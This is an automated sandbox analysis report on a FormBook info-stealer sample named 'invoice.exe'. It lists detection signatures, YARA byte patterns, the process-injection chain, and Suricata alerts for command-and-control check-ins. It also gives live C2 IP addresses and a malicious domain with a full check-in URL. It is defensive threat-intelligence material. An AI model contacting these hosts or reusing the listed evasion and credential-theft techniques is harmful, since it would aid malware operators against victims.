Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoice.exe

Overview

General Information

Sample name:invoice.exe
Analysis ID:1510744
MD5:8387395792cfc0abb08dc4c23b8ad700
SHA1:10da8047d3a56f769b7b70906cfdd3342b6487ef
SHA256:6e66e6f4874039caa5e41d1da7b90159c8ada4373c2fd27eb080c3f6d9db5d81
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • invoice.exe (PID: 5408 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 8387395792CFC0ABB08DC4C23B8AD700)
    • svchost.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • usnnduqerdgHbr.exe (PID: 3260 cmdline: "C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • at.exe (PID: 5764 cmdline: "C:\Windows\SysWOW64\at.exe" MD5: 2AE20048111861FA09B709D3CC551AD6)
          • usnnduqerdgHbr.exe (PID: 3120 cmdline: "C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5024 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e4f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f2f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\invoice.exe", CommandLine: "C:\Users\user\Desktop\invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice.exe", ParentImage: C:\Users\user\Desktop\invoice.exe, ParentProcessId: 5408, ParentProcessName: invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice.exe", ProcessId: 2520, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\invoice.exe", CommandLine: "C:\Users\user\Desktop\invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice.exe", ParentImage: C:\Users\user\Desktop\invoice.exe, ParentProcessId: 5408, ParentProcessName: invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice.exe", ProcessId: 2520, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-13T12:27:12.068665+020020507451Malware Command and Control Activity Detected192.168.2.45040134.150.58.7380TCP
            2024-09-13T12:27:44.114915+020020507451Malware Command and Control Activity Detected192.168.2.450405195.24.68.2580TCP
            2024-09-13T12:27:58.009578+020020507451Malware Command and Control Activity Detected192.168.2.450409162.0.213.9480TCP
            2024-09-13T12:28:12.118591+020020507451Malware Command and Control Activity Detected192.168.2.450413154.23.184.24080TCP
            2024-09-13T12:28:26.500137+020020507451Malware Command and Control Activity Detected192.168.2.45041747.104.180.13980TCP
            2024-09-13T12:28:47.750673+020020507451Malware Command and Control Activity Detected192.168.2.4504213.33.130.19080TCP
            2024-09-13T12:29:09.136695+020020507451Malware Command and Control Activity Detected192.168.2.450425199.59.243.22680TCP
            2024-09-13T12:29:22.926625+020020507451Malware Command and Control Activity Detected192.168.2.450429162.241.226.19080TCP
            2024-09-13T12:29:37.516534+020020507451Malware Command and Control Activity Detected192.168.2.45043391.215.85.2380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-13T12:27:12.068665+020028554651A Network Trojan was detected192.168.2.45040134.150.58.7380TCP
            2024-09-13T12:27:44.114915+020028554651A Network Trojan was detected192.168.2.450405195.24.68.2580TCP
            2024-09-13T12:27:58.009578+020028554651A Network Trojan was detected192.168.2.450409162.0.213.9480TCP
            2024-09-13T12:28:12.118591+020028554651A Network Trojan was detected192.168.2.450413154.23.184.24080TCP
            2024-09-13T12:28:26.500137+020028554651A Network Trojan was detected192.168.2.45041747.104.180.13980TCP
            2024-09-13T12:28:47.750673+020028554651A Network Trojan was detected192.168.2.4504213.33.130.19080TCP
            2024-09-13T12:29:09.136695+020028554651A Network Trojan was detected192.168.2.450425199.59.243.22680TCP
            2024-09-13T12:29:22.926625+020028554651A Network Trojan was detected192.168.2.450429162.241.226.19080TCP
            2024-09-13T12:29:37.516534+020028554651A Network Trojan was detected192.168.2.45043391.215.85.2380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-13T12:27:36.406189+020028554641A Network Trojan was detected192.168.2.450402195.24.68.2580TCP
            2024-09-13T12:27:38.981289+020028554641A Network Trojan was detected192.168.2.450403195.24.68.2580TCP
            2024-09-13T12:27:41.509593+020028554641A Network Trojan was detected192.168.2.450404195.24.68.2580TCP
            2024-09-13T12:27:50.249780+020028554641A Network Trojan was detected192.168.2.450406162.0.213.9480TCP
            2024-09-13T12:27:52.895730+020028554641A Network Trojan was detected192.168.2.450407162.0.213.9480TCP
            2024-09-13T12:27:55.566129+020028554641A Network Trojan was detected192.168.2.450408162.0.213.9480TCP
            2024-09-13T12:28:04.472198+020028554641A Network Trojan was detected192.168.2.450410154.23.184.24080TCP
            2024-09-13T12:28:07.016156+020028554641A Network Trojan was detected192.168.2.450411154.23.184.24080TCP
            2024-09-13T12:28:09.804943+020028554641A Network Trojan was detected192.168.2.450412154.23.184.24080TCP
            2024-09-13T12:28:18.860641+020028554641A Network Trojan was detected192.168.2.45041447.104.180.13980TCP
            2024-09-13T12:28:21.405375+020028554641A Network Trojan was detected192.168.2.45041547.104.180.13980TCP
            2024-09-13T12:28:23.960871+020028554641A Network Trojan was detected192.168.2.45041647.104.180.13980TCP
            2024-09-13T12:28:41.038596+020028554641A Network Trojan was detected192.168.2.4504183.33.130.19080TCP
            2024-09-13T12:28:42.647720+020028554641A Network Trojan was detected192.168.2.4504193.33.130.19080TCP
            2024-09-13T12:28:45.246673+020028554641A Network Trojan was detected192.168.2.4504203.33.130.19080TCP
            2024-09-13T12:29:01.458588+020028554641A Network Trojan was detected192.168.2.450422199.59.243.22680TCP
            2024-09-13T12:29:04.037143+020028554641A Network Trojan was detected192.168.2.450423199.59.243.22680TCP
            2024-09-13T12:29:06.625795+020028554641A Network Trojan was detected192.168.2.450424199.59.243.22680TCP
            2024-09-13T12:29:14.920189+020028554641A Network Trojan was detected192.168.2.450426162.241.226.19080TCP
            2024-09-13T12:29:17.468744+020028554641A Network Trojan was detected192.168.2.450427162.241.226.19080TCP
            2024-09-13T12:29:20.081191+020028554641A Network Trojan was detected192.168.2.450428162.241.226.19080TCP
            2024-09-13T12:29:29.806640+020028554641A Network Trojan was detected192.168.2.45043091.215.85.2380TCP
            2024-09-13T12:29:32.307060+020028554641A Network Trojan was detected192.168.2.45043191.215.85.2380TCP
            2024-09-13T12:29:34.992744+020028554641A Network Trojan was detected192.168.2.45043291.215.85.2380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.kalomor.top/1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phwAvira URL Cloud: Label: malware
            Source: http://www.kalomor.top/1i25/Avira URL Cloud: Label: malware
            Source: http://www.kalomor.topAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: kalomor.topVirustotal: Detection: 5%Perma Link
            Source: www.teksales.spaceVirustotal: Detection: 7%Perma Link
            Source: www.kalomor.topVirustotal: Detection: 5%Perma Link
            Source: http://www.kalomor.topVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: invoice.exeReversingLabs: Detection: 23%
            Source: invoice.exeVirustotal: Detection: 30%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: invoice.exeJoe Sandbox ML: detected
            Source: invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usnnduqerdgHbr.exe, 00000002.00000000.1784643817.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576287714.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FE449B
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FEC7E8
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEC75D FindFirstFileW,FindClose,0_2_00FEC75D
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF021
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF17E
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEF47F
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3833
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3B56
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEBD48

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50416 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50405 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50405 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50417 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50402 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50410 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50427 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50423 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50417 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50401 -> 34.150.58.73:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50401 -> 34.150.58.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50419 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50411 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50406 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50409 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50432 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50420 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50408 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50409 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50413 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50430 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50431 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50428 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50407 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50413 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50418 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50422 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50426 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50424 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50433 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50433 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50412 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50404 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50425 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50425 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50429 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50429 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50421 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50421 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50403 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50414 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50415 -> 47.104.180.139:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.syvra.xyz
            Source: Joe Sandbox ViewIP Address: 91.215.85.23 91.215.85.23
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
